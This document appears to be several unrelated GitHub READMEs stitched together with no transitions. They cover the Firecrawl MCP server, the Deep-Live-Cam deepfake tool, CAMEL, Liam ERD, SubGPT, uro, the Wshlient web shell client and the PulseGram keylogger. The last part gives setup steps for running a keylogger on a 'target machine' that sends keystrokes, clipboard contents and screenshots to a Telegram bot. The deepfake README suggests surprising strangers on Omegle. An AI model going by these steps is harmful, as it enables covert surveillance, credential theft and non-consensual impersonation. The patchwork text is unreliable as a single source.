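    # Assumption: cloud usage needs a key, self-hosted usage needs a URL.
    if not config["FIRECRAWL_API_KEY"] and not config["FIRECRAWL_API_URL"]:
        raise ValueError(
            "Set FIRECRAWL_API_KEY (cloud) or FIRECRAWL_API_URL (self-hosted)"
        )
    return config


example = load_config({"FIRECRAWL_API_KEY": "fc-test", "FIRECRAWL_RETRY_MAX_ATTEMPTS": "5"})
print(example["FIRECRAWL_RETRY_MAX_ATTEMPTS"], example["FIRECRAWL_RETRY_MAX_DELAY"])
```

Passing a plain dictionary instead of `os.environ` keeps the loader easy to try out without touching the real environment.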
Add this to your claude_desktop_config.json:
{
  "mcpServers": {
    "mcp-server-firecrawl": {
      "command": "npx",
      "args": ["-y", "firecrawl-mcp"],
      "env": {
        "FIRECRAWL_API_KEY": "YOUR_API_KEY_HERE",
        "FIRECRAWL_RETRY_MAX_ATTEMPTS": "5",
        "FIRECRAWL_RETRY_INITIAL_DELAY": "2000",
        "FIRECRAWL_RETRY_MAX_DELAY": "30000",
        "FIRECRAWL_RETRY_BACKOFF_FACTOR": "3",
        "FIRECRAWL_CREDIT_WARNING_THRESHOLD": "2000",
        "FIRECRAWL_CREDIT_CRITICAL_THRESHOLD": "500"
      }
    }
  }
}
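
If the config file already lists other MCP servers, hand-editing the JSON is easy to get wrong. The Python sketch below merges a Firecrawl entry into an existing file while leaving other entries untouched. The helper name `add_firecrawl_server` is hypothetical, and the location of the config file is left to the caller because it differs between platforms.

```python
import json
from pathlib import Path


def add_firecrawl_server(config_path, api_key, server_name="mcp-server-firecrawl"):
    """Insert or update the Firecrawl entry without touching other servers."""
    path = Path(config_path)
    # Start from the existing file if there is one, otherwise from scratch.
    config = json.loads(path.read_text(encoding="utf-8")) if path.exists() else {}
    servers = config.setdefault("mcpServers", {})
    servers[server_name] = {
        "command": "npx",
        "args": ["-y", "firecrawl-mcp"],
        "env": {"FIRECRAWL_API_KEY": api_key},
    }
    path.write_text(json.dumps(config, indent=2) + "\n", encoding="utf-8")
    return config
```

Calling `add_firecrawl_server("claude_desktop_config.json", "YOUR_API_KEY_HERE")` would write the minimal entry; the optional retry and credit variables can be added to the `env` dictionary in the same way.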
The server includes several configurable parameters that can be set via environment variables. Here are the default values if not configured:
const CONFIG = {
retry: {
maxAttempts: 3, // Number of retry attempts for rate-limited requests
initialDelay: 1000, // Initial delay before first retry (in milliseconds)
maxDelay: 10000, // Maximum delay between retries (in milliseconds)
backoffFactor: 2, // Multiplier for exponential backoff
},
credit: {
warningThreshold: 1000, // Warn when credit usage reaches this level
criticalThreshold: 100, // Critical alert when credit usage reaches this level
},
};
These configurations control:
Retry Behavior
Automatically retries failed requests due to rate limits
Example: With default settings, retries will be attempted at:
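The retry schedule follows from the backoff settings shown in the configuration above. A minimal sketch, assuming each delay is `initialDelay * backoffFactor^(attempt - 1)` capped at `maxDelay` (the server's exact formula is not shown here, and `retry_delays` is a hypothetical helper name):

```python
def retry_delays(max_attempts=3, initial_delay=1000, max_delay=10000, backoff_factor=2):
    """Return the delay in milliseconds before each retry (capped exponential backoff)."""
    return [
        min(initial_delay * backoff_factor ** attempt, max_delay)
        for attempt in range(max_attempts)
    ]


print(retry_delays())                   # [1000, 2000, 4000] with the defaults
print(retry_delays(5, 2000, 30000, 3))  # [2000, 6000, 18000, 30000, 30000]
```

With the custom cloud configuration, the cap takes effect from the fourth retry onward.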
Credit Usage Monitoring
The server utilizes Firecrawl's built-in rate limiting and batch processing capabilities:
firecrawl_scrape
Scrape content from a single URL with advanced options.
{
"name": "firecrawl_scrape",
"arguments": {
"url": "https://example.com",
"formats": ["markdown"],
"onlyMainContent": true,
"waitFor": 1000,
"timeout": 30000,
"mobile": false,
"includeTags": ["article", "main"],
"excludeTags": ["nav", "footer"],
"skipTlsVerification": false
}
}
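MCP clients deliver tool invocations like the one above as JSON-RPC 2.0 requests using the `tools/call` method. The sketch below only builds such a request; `tool_call_request` is a hypothetical helper, and how the request is transported to the server is left to the client.

```python
import json


def tool_call_request(request_id, name, arguments):
    """Wrap a tool invocation in a JSON-RPC 2.0 `tools/call` request."""
    return {
        "jsonrpc": "2.0",
        "id": request_id,
        "method": "tools/call",
        "params": {"name": name, "arguments": arguments},
    }


request = tool_call_request(
    1,
    "firecrawl_scrape",
    {"url": "https://example.com", "formats": ["markdown"], "onlyMainContent": True},
)
print(json.dumps(request, indent=2))
```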
firecrawl_batch_scrape
Scrape multiple URLs efficiently with built-in rate limiting and parallel processing.
{
"name": "firecrawl_batch_scrape",
"arguments": {
"urls": ["https://example1.com", "https://example2.com"],
"options": {
"formats": ["markdown"],
"onlyMainContent": true
}
}
}
Response includes operation ID for status checking:
{
"content": [
{
"type": "text",
"text": "Batch operation queued with ID: batch_1. Use firecrawl_check_batch_status to check progress."
}
],
"isError": false
}
firecrawl_check_batch_status
Check the status of a batch operation.
{
"name": "firecrawl_check_batch_status",
"arguments": {
"id": "batch_1"
}
}
firecrawl_search
Search the web and optionally extract content from search results.
{
"name": "firecrawl_search",
"arguments": {
"query": "your search query",
"limit": 5,
"lang": "en",
"country": "us",
"scrapeOptions": {
"formats": ["markdown"],
"onlyMainContent": true
}
}
}
firecrawl_crawl
Start an asynchronous crawl with advanced options.
{
"name": "firecrawl_crawl",
"arguments": {
"url": "https://example.com",
"maxDepth": 2,
"limit": 100,
"allowExternalLinks": false,
"deduplicateSimilarURLs": true
}
}
firecrawl_extract
Extract structured information from web pages using LLM capabilities. Supports both cloud AI and self-hosted LLM extraction.
{
"name": "firecrawl_extract",
"arguments": {
"urls": ["https://example.com/page1", "https://example.com/page2"],
"prompt": "Extract product information including name, price, and description",
"systemPrompt": "You are a helpful assistant that extracts product information",
"schema": {
"type": "object",
"properties": {
"name": { "type": "string" },
"price": { "type": "number" },
"description": { "type": "string" }
},
"required": ["name", "price"]
},
"allowExternalLinks": false,
"enableWebSearch": false,
"includeSubdomains": false
}
}
Example response:
{
"content": [
{
"type": "text",
"text": {
"name": "Example Product",
"price": 99.99,
"description": "This is an example product description"
}
}
],
"isError": false
}
urls
: Array of URLs to extract information from
prompt
: Custom prompt for the LLM extraction
systemPrompt
: System prompt to guide the LLM
schema
: JSON schema for structured data extraction
allowExternalLinks
: Allow extraction from external links
enableWebSearch
: Enable web search for additional context
includeSubdomains
: Include subdomains in extraction

When using a self-hosted instance, the extraction will use your configured LLM. For cloud API, it uses Firecrawl's managed LLM service.
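Because the `schema` argument is plain JSON Schema, extracted results can be checked on the client side before use. The following is a minimal sketch that covers only flat schemas with `required` and primitive `type` entries, like the example above; `check_against_schema` is a hypothetical helper, and a full JSON Schema validator would be the better choice for anything more complex.

```python
SCHEMA = {
    "type": "object",
    "properties": {
        "name": {"type": "string"},
        "price": {"type": "number"},
        "description": {"type": "string"},
    },
    "required": ["name", "price"],
}

# Maps the JSON Schema type names used above to Python types.
JSON_TYPES = {"string": str, "number": (int, float)}


def check_against_schema(data, schema):
    """Return a list of problems; an empty list means the data fits the schema."""
    problems = []
    for field in schema.get("required", []):
        if field not in data:
            problems.append(f"missing required field: {field}")
    for field, spec in schema.get("properties", {}).items():
        if field in data:
            value = data[field]
            # bool is a subclass of int in Python, so reject it explicitly.
            if isinstance(value, bool) or not isinstance(value, JSON_TYPES[spec["type"]]):
                problems.append(f"{field} should be of type {spec['type']}")
    return problems


product = {"name": "Example Product", "price": 99.99,
           "description": "This is an example product description"}
print(check_against_schema(product, SCHEMA))          # []
print(check_against_schema({"name": "x"}, SCHEMA))    # ['missing required field: price']
```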
Conduct deep web research on a query using intelligent crawling, search, and LLM analysis.
{
"name": "firecrawl_deep_research",
"arguments": {
"query": "how does carbon capture technology work?",
"maxDepth": 3,
"timeLimit": 120,
"maxUrls": 50
}
}
Arguments:
Returns:
Generate a standardized llms.txt (and optionally llms-full.txt) file for a given domain. This file defines how large language models should interact with the site.
{
"name": "firecrawl_generate_llmstxt",
"arguments": {
"url": "https://example.com",
"maxUrls": 20,
"showFullText": true
}
}
Arguments:
Returns:
The server includes comprehensive logging:
Example log messages:
[INFO] Firecrawl MCP Server initialized successfully
[INFO] Starting scrape for URL: https://example.com
[INFO] Batch operation queued with ID: batch_1
[WARNING] Credit usage has reached warning threshold
[ERROR] Rate limit exceeded, retrying in 2s...
The server provides robust error handling:
Example error response:
{
"content": [
{
"type": "text",
"text": "Error: Rate limit exceeded. Retrying in 2 seconds..."
}
],
"isError": true
}
# Install dependencies
npm install
# Build
npm run build
# Run tests
npm test
MIT License - see LICENSE file for details
Real-time face swap and video deepfake with a single click and only a single image.
This deepfake software is designed to be a productive tool for the AI-generated media industry. It can assist artists in animating custom characters, creating engaging content, and even using models for clothing design.
We are aware of the potential for unethical applications and are committed to preventative measures. A built-in check prevents the program from processing inappropriate media (nudity, graphic content, sensitive material like war footage, etc.). We will continue to develop this project responsibly, adhering to the law and ethics. We may shut down the project or add watermarks if legally required.
Ethical Use: Users are expected to use this software responsibly and legally. If using a real person's face, obtain their consent and clearly label any output as a deepfake when sharing online.
Content Restrictions: The software includes built-in checks to prevent processing inappropriate media, such as nudity, graphic content, or sensitive material.
Legal Compliance: We adhere to all relevant laws and ethical guidelines. If legally required, we may shut down the project or add watermarks to the output.
User Responsibility: We are not responsible for end-user actions. Users must ensure their use of the software aligns with ethical standards and legal requirements.
By using this software, you agree to these terms and commit to using it in a manner that respects the rights and dignity of others.
1. Select a face
2. Select which camera to use
3. Press live!
Retain your original mouth for accurate movement using Mouth Mask
Use different faces on multiple subjects simultaneously
Watch movies with any face in real-time
Run Live shows and performances
Create Your Most Viral Meme Yet
Created using Many Faces feature in Deep-Live-Cam
Surprise people on Omegle
Please be aware that the installation requires technical skills and is not for beginners. Consider downloading the prebuilt version.
git clone https://github.com/hacksider/Deep-Live-Cam.git
cd Deep-Live-Cam
**3. Download the Models**

1. [GFPGANv1.4](https://huggingface.co/hacksider/deep-live-cam/resolve/main/GFPGANv1.4.pth)
2. [inswapper\_128\_fp16.onnx](https://huggingface.co/hacksider/deep-live-cam/resolve/main/inswapper_128_fp16.onnx)

Place these files in the "**models**" folder.

**4. Install Dependencies**

We highly recommend using a `venv` to avoid issues.

For Windows:

python -m venv venv
venv\Scripts\activate
pip install -r requirements.txt
**For macOS:**

Apple Silicon (M1/M2/M3) requires specific setup:

# Install Python 3.10 (specific version is important)
brew install python@3.10
# Install tkinter package (required for the GUI)
brew install python-tk@3.10
# Create and activate virtual environment with Python 3.10
python3.10 -m venv venv
source venv/bin/activate
# Install dependencies
pip install -r requirements.txt
**In case something goes wrong and you need to reinstall the virtual environment:**

# Deactivate and remove the virtual environment
deactivate
rm -rf venv
# Reinstall the virtual environment
python3.10 -m venv venv
source venv/bin/activate
# install the dependencies again
pip install -r requirements.txt
**Run:** If you don't have a GPU, you can run Deep-Live-Cam using `python run.py`. Note that initial execution will download models (~300MB).

### GPU Acceleration

**CUDA Execution Provider (Nvidia)**

1. Install [CUDA Toolkit 11.8.0](https://developer.nvidia.com/cuda-11-8-0-download-archive)
2. Install dependencies:

pip uninstall onnxruntime onnxruntime-gpu
pip install onnxruntime-gpu==1.16.3

3. Usage:

python run.py --execution-provider cuda
**CoreML Execution Provider (Apple Silicon)**

Apple Silicon (M1/M2/M3) specific installation:

1. Make sure you've completed the macOS setup above using Python 3.10.
2. Install dependencies:

pip uninstall onnxruntime onnxruntime-silicon
pip install onnxruntime-silicon==1.13.1

3. Usage (important: specify Python 3.10):

python3.10 run.py --execution-provider coreml
**Important Notes for macOS:**

- You **must** use Python 3.10, not newer versions like 3.11 or 3.13
- Always run with the `python3.10` command, not just `python`, if you have multiple Python versions installed
- If you get an error about `_tkinter` missing, reinstall the tkinter package: `brew reinstall python-tk@3.10`
- If you get model loading errors, check that your models are in the correct folder
- If you encounter conflicts with other Python versions, consider uninstalling them:

```bash
# List all installed Python versions
brew list | grep python
# Uninstall conflicting versions if needed
brew uninstall --ignore-dependencies python@3.11 python@3.13
# Keep only Python 3.10
brew cleanup
```

**CoreML Execution Provider (Apple Legacy)**

1. Install dependencies:

pip uninstall onnxruntime onnxruntime-coreml
pip install onnxruntime-coreml==1.13.1

2. Usage:

python run.py --execution-provider coreml
**DirectML Execution Provider (Windows)**

1. Install dependencies:

pip uninstall onnxruntime onnxruntime-directml
pip install onnxruntime-directml==1.15.1

2. Usage:

python run.py --execution-provider directml
**OpenVINO™ Execution Provider (Intel)**

1. Install dependencies:

pip uninstall onnxruntime onnxruntime-openvino
pip install onnxruntime-openvino==1.15.0

2. Usage:

python run.py --execution-provider openvino
1. Image/Video Mode
python run.py
2. Webcam Mode
python run.py

Check out these helpful guides to get the most out of Deep-Live-Cam:
Visit our official blog for more tips and tutorials.
options:
-h, --help show this help message and exit
-s SOURCE_PATH, --source SOURCE_PATH select a source image
-t TARGET_PATH, --target TARGET_PATH select a target image or video
-o OUTPUT_PATH, --output OUTPUT_PATH select output file or directory
--frame-processor FRAME_PROCESSOR [FRAME_PROCESSOR ...] frame processors (choices: face_swapper, face_enhancer, ...)
--keep-fps keep original fps
--keep-audio keep original audio
--keep-frames keep temporary frames
--many-faces process every face
--map-faces map source target faces
--mouth-mask mask the mouth region
--video-encoder {libx264,libx265,libvpx-vp9} adjust output video encoder
--video-quality [0-51] adjust output video quality
--live-mirror the live camera display as you see it in the front-facing camera frame
--live-resizable the live camera frame is resizable
--max-memory MAX_MEMORY maximum amount of RAM in GB
--execution-provider {cpu} [{cpu} ...] available execution provider (choices: cpu, ...)
--execution-threads EXECUTION_THREADS number of execution threads
-v, --version show program's version number and exit
Looking for a CLI mode? Passing the -s/--source argument makes the program run in CLI mode.
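For scripted runs, the flags listed in the help output can be assembled programmatically. This is only a sketch: `build_cli_command` and the file names are hypothetical, and it uses a small subset of the documented options.

```python
import sys


def build_cli_command(source, target, output, execution_provider="cpu",
                      keep_fps=False, many_faces=False):
    """Assemble an argument list for run.py from the documented CLI flags."""
    cmd = [sys.executable, "run.py",
           "-s", source, "-t", target, "-o", output,
           "--execution-provider", execution_provider]
    if keep_fps:
        cmd.append("--keep-fps")
    if many_faces:
        cmd.append("--many-faces")
    return cmd


cmd = build_cli_command("face.jpg", "clip.mp4", "swapped.mp4", keep_fps=True)
print(" ".join(cmd[1:]))
# To execute it from the Deep-Live-Cam checkout:
#   import subprocess; subprocess.run(cmd, check=True)
```

Passing the arguments as a list rather than a single shell string avoids quoting problems with paths that contain spaces.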
We are always open to criticism and are ready to improve, that's why we didn't cherry-pick anything.
🐫 CAMEL is an open-source community dedicated to finding the scaling laws of agents. We believe that studying these agents on a large scale offers valuable insights into their behaviors, capabilities, and potential risks. To facilitate research in this field, we implement and support various types of agents, tasks, prompts, models, and simulated environments.
The framework is designed to support systems with millions of agents, ensuring efficient coordination, communication, and resource management at scale.
Agents maintain stateful memory, enabling them to perform multi-step interactions with environments and efficiently tackle sophisticated tasks.
Every line of code and comment serves as a prompt for agents. Code should be written clearly and readably, ensuring both humans and agents can interpret it effectively.
We are a community-driven research collective comprising over 100 researchers dedicated to advancing frontier research in Multi-Agent Systems. Researchers worldwide choose CAMEL for their studies based on the following reasons.
✅ | Large-Scale Agent System | Simulate up to 1M agents to study emergent behaviors and scaling laws in complex, multi-agent environments. |
✅ | Dynamic Communication | Enable real-time interactions among agents, fostering seamless collaboration for tackling intricate tasks. |
✅ | Stateful Memory | Equip agents with the ability to retain and leverage historical context, improving decision-making over extended interactions. |
✅ | Support for Multiple Benchmarks | Utilize standardized benchmarks to rigorously evaluate agent performance, ensuring reproducibility and reliable comparisons. |
✅ | Support for Different Agent Types | Work with a variety of agent roles, tasks, models, and environments, supporting interdisciplinary experiments and diverse research applications. |
✅ | Data Generation and Tool Integration | Automate the creation of large-scale, structured datasets while seamlessly integrating with multiple tools, streamlining synthetic data generation and research workflows. |
Installing CAMEL is a breeze thanks to its availability on PyPI. Simply open your terminal and run:
pip install camel-ai
This example demonstrates how to create a `ChatAgent` using the CAMEL framework and perform a search query using DuckDuckGo.
pip install 'camel-ai[web_tools]'
export OPENAI_API_KEY='your_openai_api_key'
```python
from camel.models import ModelFactory
from camel.types import ModelPlatformType, ModelType
from camel.agents import ChatAgent
from camel.toolkits import SearchToolkit

model = ModelFactory.create(
    model_platform=ModelPlatformType.OPENAI,
    model_type=ModelType.GPT_4O,
    model_config_dict={"temperature": 0.0},
)

search_tool = SearchToolkit().search_duckduckgo

agent = ChatAgent(model=model, tools=[search_tool])

response_1 = agent.step("What is CAMEL-AI?")
print(response_1.msgs[0].content)
# CAMEL-AI is the first LLM (Large Language Model) multi-agent framework
# and an open-source community focused on finding the scaling laws of agents.
# ...

response_2 = agent.step("What is the Github link to CAMEL framework?")
print(response_2.msgs[0].content)
# The GitHub link to the CAMEL framework is
# https://github.com/camel-ai/camel.
```
For more detailed instructions and additional configuration options, check out the installation section.
After running, you can explore our CAMEL Tech Stack and Cookbooks at docs.camel-ai.org to build powerful multi-agent systems.
We provide a demo showcasing a conversation between two ChatGPT agents playing the roles of a Python programmer and a stock trader collaborating on developing a trading bot for the stock market.
Explore different types of agents, their roles, and their applications.
Please reach out to us on the CAMEL Discord if you encounter any issues setting up CAMEL.
Core components and utilities to build, operate, and enhance CAMEL-AI agents and societies.
Module | Description |
---|---|
Agents | Core agent architectures and behaviors for autonomous operation. |
Agent Societies | Components for building and managing multi-agent systems and collaboration. |
Data Generation | Tools and methods for synthetic data creation and augmentation. |
Models | Model architectures and customization options for agent intelligence. |
Tools | Tools integration for specialized agent tasks. |
Memory | Memory storage and retrieval mechanisms for agent state management. |
Storage | Persistent storage solutions for agent data and states. |
Benchmarks | Performance evaluation and testing frameworks. |
Interpreters | Code and command interpretation capabilities. |
Data Loaders | Data ingestion and preprocessing tools. |
Retrievers | Knowledge retrieval and RAG components. |
Runtime | Execution environment and process management. |
Human-in-the-Loop | Interactive components for human oversight and intervention. |
We believe that studying these agents on a large scale offers valuable insights into their behaviors, capabilities, and potential risks.
Explore our research projects:
Research with Us
We warmly invite you to use CAMEL for your impactful research.
Rigorous research takes time and resources. We are a community-driven research collective with 100+ researchers exploring the frontier of Multi-Agent Systems research. Join our ongoing projects or test new ideas with us; reach out via email for more information.
For more details, please see our Models Documentation.
Data (Hosted on Hugging Face)
Dataset | Chat format | Instruction format | Chat format (translated) |
---|---|---|---|
AI Society | Chat format | Instruction format | Chat format (translated) |
Code | Chat format | Instruction format | x |
Math | Chat format | x | x |
Physics | Chat format | x | x |
Chemistry | Chat format | x | x |
Biology | Chat format | x | x |
Dataset | Instructions | Tasks |
---|---|---|
AI Society | Instructions | Tasks |
Code | Instructions | Tasks |
Misalignment | Instructions | Tasks |
Practical guides and tutorials for implementing specific functionalities in CAMEL-AI agents and societies.
Cookbook | Description |
---|---|
Creating Your First Agent | A step-by-step guide to building your first agent. |
Creating Your First Agent Society | Learn to build a collaborative society of agents. |
Message Cookbook | Best practices for message handling in agents. |
Cookbook | Description |
---|---|
Tools Cookbook | Integrating tools for enhanced functionality. |
Memory Cookbook | Implementing memory systems in agents. |
RAG Cookbook | Recipes for Retrieval-Augmented Generation. |
Graph RAG Cookbook | Leveraging knowledge graphs with RAG. |
Track CAMEL Agents with AgentOps | Tools for tracking and managing agents in operations. |
Cookbook | Description |
---|---|
Data Generation with CAMEL and Finetuning with Unsloth | Learn how to generate data with CAMEL and fine-tune models effectively with Unsloth. |
Data Gen with Real Function Calls and Hermes Format | Explore how to generate data with real function calls and the Hermes format. |
CoT Data Generation and Upload Data to Huggingface | Uncover how to generate CoT data with CAMEL and seamlessly upload it to Huggingface. |
CoT Data Generation and SFT Qwen with Unsloth | Discover how to generate CoT data using CAMEL and SFT Qwen with Unsloth, and seamlessly upload your data and model to Huggingface. |
Cookbook | Description |
---|---|
Role-Playing Scraper for Report & Knowledge Graph Generation | Create role-playing agents for data scraping and reporting. |
Create A Hackathon Judge Committee with Workforce | Building a team of agents for collaborative judging. |
Dynamic Knowledge Graph Role-Playing: Multi-Agent System with dynamic, temporally-aware knowledge graphs | Builds dynamic, temporally-aware knowledge graphs for financial applications using a multi-agent system. It processes financial reports, news articles, and research papers to help traders analyze data, identify relationships, and uncover market insights. The system also utilizes diverse and optional element node deduplication techniques to ensure data integrity and optimize graph structure for financial decision-making. |
Customer Service Discord Bot with Agentic RAG | Learn how to build a robust customer service bot for Discord using Agentic RAG. |
Customer Service Discord Bot with Local Model | Learn how to build a robust customer service bot for Discord using Agentic RAG which supports local deployment. |
Cookbook | Description |
---|---|
Video Analysis | Techniques for agents in video data analysis. |
3 Ways to Ingest Data from Websites with Firecrawl | Explore three methods for extracting and processing data from websites using Firecrawl. |
Create AI Agents that work with your PDFs | Learn how to create AI agents that work with your PDFs using Chunkr and Mistral AI. |
For those who'd like to contribute code, we appreciate your interest in contributing to our open-source initiative. Please take a moment to review our contributing guidelines to get started on a smooth collaboration journey. 🚀
We also welcome you to help CAMEL grow by sharing it on social media, at events, or during conferences. Your support makes a big difference!
For more information please contact camel-ai@eigent.ai
GitHub Issues: Report bugs, request features, and track development. Submit an issue
Discord: Get real-time support, chat with the community, and stay updated. Join us
X (Twitter): Follow for updates, AI insights, and key announcements. Follow us
Ambassador Project: Advocate for CAMEL-AI, host events, and contribute content. Learn more
@inproceedings{li2023camel,
title={CAMEL: Communicative Agents for "Mind" Exploration of Large Language Model Society},
author={Li, Guohao and Hammoud, Hasan Abed Al Kader and Itani, Hani and Khizbullin, Dmitrii and Ghanem, Bernard},
booktitle={Thirty-seventh Conference on Neural Information Processing Systems},
year={2023}
}
Special thanks to Nomic AI for giving us extended access to their data set exploration tool (Atlas).
We would also like to thank Haya Hammoud for designing the initial logo of our project.
We implemented amazing research ideas from other works for you to build, compare and customize your agents. If you use any of these modules, please kindly cite the original works:
- `TaskCreationAgent`, `TaskPrioritizationAgent` and `BabyAGI` from Nakajima et al.: Task-Driven Autonomous Agent. [Example]
- `PersonaHub` from Tao Ge et al.: Scaling Synthetic Data Creation with 1,000,000,000 Personas. [Example]
- `Self-Instruct` from Yizhong Wang et al.: SELF-INSTRUCT: Aligning Language Models with Self-Generated Instructions. [Example]
The source code is licensed under Apache 2.0.
Website • Documentation • Roadmap
Liam ERD generates beautiful, interactive ER diagrams from your database. Whether you're working on public or private repositories, Liam ERD helps you visualize complex schemas with ease.
Insert `liambx.com/erd/p/` into your schema file's URL:
# Original: https://github.com/user/repo/blob/master/db/schema.rb
# Modified: https://liambx.com/erd/p/github.com/user/repo/blob/master/db/schema.rb
#           👾^^^^^^^^^^^^^^^^👾
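The same rewrite can be scripted when you have many schema URLs. A minimal sketch, assuming the input is an `https://` URL as in the example above (`to_liam_erd_url` is a hypothetical helper name):

```python
def to_liam_erd_url(schema_url):
    """Insert 'liambx.com/erd/p/' right after the scheme of a schema file URL."""
    prefix = "https://"
    if not schema_url.startswith(prefix):
        raise ValueError("expected an https:// URL")
    return prefix + "liambx.com/erd/p/" + schema_url[len(prefix):]


print(to_liam_erd_url("https://github.com/user/repo/blob/master/db/schema.rb"))
# https://liambx.com/erd/p/github.com/user/repo/blob/master/db/schema.rb
```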
Run the interactive setup:
npx @liam-hq/cli init
If you find this project helpful, please give it a star! ⭐
Your support helps us reach a wider audience and continue development.
Check out the full documentation on the website.
See what we're working on and what's coming next on our roadmap.
SubGPT looks at subdomains you have already discovered for a domain and uses BingGPT to find more. Best part? It's free!
The following subdomains were found by this tool with these 30 subdomains as input.
call-prompts-staging.example.com
dclb02-dca1.prod.example.com
activedirectory-sjc1.example.com
iadm-staging.example.com
elevatenetwork-c.example.com
If you like my work, you can support me with as little as $1, here :)
pip install subgpt
git clone https://github.com/s0md3v/SubGPT && cd SubGPT && python setup.py install
cookies.json
Note: Any issues regarding BingGPT itself should be reported to EdgeGPT, not here.
It is supposed to be used after you have discovered some subdomains using all other methods. The standard way to run SubGPT is as follows:
subgpt -i input.txt -o output.txt -c /path/to/cookies.json
If you don't specify an output file, the output will be shown in your terminal (`stdout`) instead.
To generate subdomains and not resolve them, use the `--dont-resolve` option. It's a great way to see all subdomains generated by SubGPT and/or use your own resolver on them.
Using a URL list for security testing can be painful as there are a lot of URLs that have uninteresting/duplicate content; uro aims to solve that.
It doesn't make any HTTP requests to the URLs and removes:
- incremental urls e.g. `/page/1/` and `/page/2/`
- blog posts and similar human written content e.g. `/posts/a-brief-history-of-time`
- urls with same path but parameter value difference e.g. `/page.php?id=1` and `/page.php?id=2`
- images, js, css and other "useless" files
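To make the idea concrete, here is a rough sketch of pattern-based deduplication. It is not uro's actual implementation: the function names and the extension list are illustrative assumptions, and the blog-post heuristic is left out entirely.

```python
import re
from urllib.parse import urlsplit, parse_qsl

STATIC_EXTENSIONS = (".jpg", ".png", ".js", ".css")  # illustrative subset only


def url_pattern(url):
    """Reduce a URL to a pattern that ignores page numbers and parameter values."""
    parts = urlsplit(url)
    # Treat purely numeric path segments (/page/1/, /page/2/) as the same segment.
    path = re.sub(r"/\d+(?=/|$)", "/{n}", parts.path)
    # Keep parameter names only, so ?id=1 and ?id=2 collapse together.
    names = tuple(sorted(name for name, _ in parse_qsl(parts.query, keep_blank_values=True)))
    return parts.netloc, path, names


def dedupe(urls):
    """Keep the first URL seen for each pattern and drop static files."""
    seen, kept = set(), []
    for url in urls:
        if urlsplit(url).path.lower().endswith(STATIC_EXTENSIONS):
            continue
        key = url_pattern(url)
        if key not in seen:
            seen.add(key)
            kept.append(url)
    return kept


urls = [
    "http://example.com/page/1/",
    "http://example.com/page/2/",
    "http://example.com/page.php?id=1",
    "http://example.com/page.php?id=2",
    "http://example.com/logo.png",
]
print(dedupe(urls))
# ['http://example.com/page/1/', 'http://example.com/page.php?id=1']
```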
The recommended way to install uro is as follows:
pipx install uro
Note: If you are using an older version of Python, use `pip` instead of `pipx`.
The quickest way to include uro in your workflow is to feed it data through stdin and print it to your terminal.
cat urls.txt | uro
uro -i input.txt
If the file already exists, uro will not overwrite the contents. Otherwise, it will create a new file.
uro -i input.txt -o output.txt
-w/--whitelist
uro will ignore all other extensions except the ones provided.
uro -w php asp html
Note: Extensionless pages e.g. `/books/1` will still be included. To remove them too, use `--filter hasext`.
-b/--blacklist
uro will ignore the given extensions.
uro -b jpg png js pdf
Note: uro has a list of "useless" extensions which it removes by default; that list will be overridden by whatever extensions you provide through the blacklist option. Extensionless pages e.g. `/books/1` will still be included. To remove them too, use `--filter hasext`.
For granular control, uro supports the following filters:
http://example.com/page.php?id=
http://example.com/page.php
http://example.com/page.php
http://example.com/page
.jpg
which would be removed otherwisehttp://example.com/page/
Example: uro --filters hasexts hasparams
Web Shell Client
`Wshlient` is a web shell client designed to be simple yet versatile. You just need to create a text file containing an HTTP request and indicate where `Wshlient` should inject the commands; then you can enjoy a shell.
Beyond Python's included batteries, `Wshlient` only uses `requests`. Just install it directly or using `requirements.txt`:
$ git clone https://github.com/gildasio/wshlient
$ cd wshlient
$ pip install -r requirements.txt
$ ./wshlient.py -h
Alternatively, you can create a symbolic link in your `$PATH` to use it directly anywhere in the system:
$ ln -s $PWD/wshlient.py /usr/local/bin/wshlient
$ ./wshlient.py -h
usage: wshlient.py [-h] [-d] [-i] [-ne] [-it INJECTION_TOKEN] [-st START_TOKEN] [-et END_TOKEN] req
positional arguments:
req File containing raw http request
options:
-h, --help show this help message and exit
-d, --debug Enable debug output
-i, --ifs Replaces whitespaces with $IFS
-ne, --no-url-encode Disable command URL encode
-it INJECTION_TOKEN, --injection-token INJECTION_TOKEN
Token to be replaced by commands (default: INJECT)
-st START_TOKEN, --start-token START_TOKEN
Token that marks the output beginning
-et END_TOKEN, --end-token END_TOKEN
Token that marks the output ending
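The token options above suggest a simple template mechanism: the injection token in the request file is replaced by the command, and the start and end tokens delimit the command output in the response. The sketch below illustrates that idea with plain string handling; it is not the tool's actual code, and the function names, request text, and marker strings are hypothetical.

```python
from urllib.parse import quote


def inject_command(raw_request, command, token="INJECT", url_encode=True):
    """Replace the injection token in a raw HTTP request with the command."""
    if url_encode:
        command = quote(command, safe="")
    return raw_request.replace(token, command)


def extract_output(body, start_token, end_token):
    """Return the text found between the start and end tokens of a response body."""
    start = body.index(start_token) + len(start_token)
    end = body.index(end_token, start)
    return body[start:end]


raw = "GET /shell.php?cmd=INJECT HTTP/1.1\r\nHost: example.com\r\n\r\n"
print(inject_command(raw, "id -u").splitlines()[0])
# GET /shell.php?cmd=id%20-u HTTP/1.1
print(extract_output("<html>[S]uid=1000[E]</html>", "[S]", "[E]"))
# uid=1000
```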
You can contribute to `Wshlient` by:
Feel free to do it, but keep in mind to keep it simple.
PulseGram is a keylogger integrated with a Telegram bot. It is a monitoring tool that captures keystrokes, clipboard content, and screenshots, sending all the information to a configured Telegram bot. It is designed for use in adversary simulations and security testing contexts.
⚠️ Warning: This project is for educational purposes and security testing in authorized environments only. Unauthorized use of this tool may be illegal and is prohibited.
_____ _ _____
| __ \ | | / ____|
| |__) | _| |___ ___| | __ _ __ __ _ _ __ ___
| ___/ | | | / __|/ _ \ | |_ | '__/ _` | '_ ` _ \
| | | |_| | \__ \ __/ |__| | | | (_| | | | | | |
|_| \__,_|_|___/\___|\_____|_| \__,_|_| |_| |_|
Author: Omar Salazar
Version: V.1.0
errors_log.txt
file to facilitate debugging.
Clone the repository:
git clone https://github.com/TaurusOmar/pulsegram
cd pulsegram
Install dependencies: Make sure you have Python 3 and pip installed. Then run:
pip install -r requirements.txt
Set up the Telegram bot token: Create a bot on Telegram using BotFather. Copy your token and paste it into the code in `main.py` where the bot is initialized.
Copy your chat ID into `chat_id="131933xxxx"` in `keylogger.py`.
Run the tool on the target machine with:
python pulsegram.py
This is the main file of the tool, which initializes the bot and launches asynchronous tasks to capture and send data.
Bot(token="...")
: Initializes the Telegram bot with your personal token.
asyncio.gather(...)
: Launches multiple tasks to execute clipboard monitoring, screenshot capture, and keystroke logging.
log_error
